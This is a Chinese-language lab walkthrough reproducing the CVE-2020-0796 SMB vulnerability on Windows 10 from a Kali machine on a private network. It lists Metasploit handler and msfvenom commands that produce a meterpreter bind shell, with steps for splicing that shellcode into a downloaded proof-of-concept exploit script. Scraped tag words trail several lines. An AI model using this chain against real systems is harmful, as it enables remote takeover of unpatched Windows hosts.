CVE-2020-0796(永恆之黑)漏洞復現

1、影響範圍(需關閉 Win10 防火牆):

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)


2、環境準備:

環境準備:python

  • kali,ip:192.168.201.152(攻擊機)
  • 受影響版本的Win10,ip:192.168.201.132(須關閉防火牆)

漏洞檢測工具下載地址:git

PoC下載地址:shell


3、漏洞復現:

一、先對使用 kali 對 9999 端口進行監聽:tcp

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.201.132
run

在這裏插入圖片描述

二、kali 使用 msf 生成木馬(此處端口需跟監聽的端口是一致的)工具

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py

木馬生成後的內容爲:
在這裏插入圖片描述code

下載好的 POC:
在這裏插入圖片描述blog

三、先把木馬的內的 buf 替換爲 USER_PAYLOAD ,再替換 exploit.py 內的 USER_PAYLOAD 行的內容圖片

  • :set nu   // 顯示行
  • :91,127s/buf/USER_PAYLOAD   // 把91-127行的 buf 替換爲 USER_PAYLOAD
    在這裏插入圖片描述

四、使用 Python3 運行(在此處需按一次回車)
在這裏插入圖片描述
在這裏插入圖片描述

五、此時監聽的 9999 端口已收到訪反彈的 shell

  • // 如未收到反彈的 Shell 則使用 Python 從新運行一次 POC

在這裏插入圖片描述
在這裏插入圖片描述

相關文章
相關標籤/搜索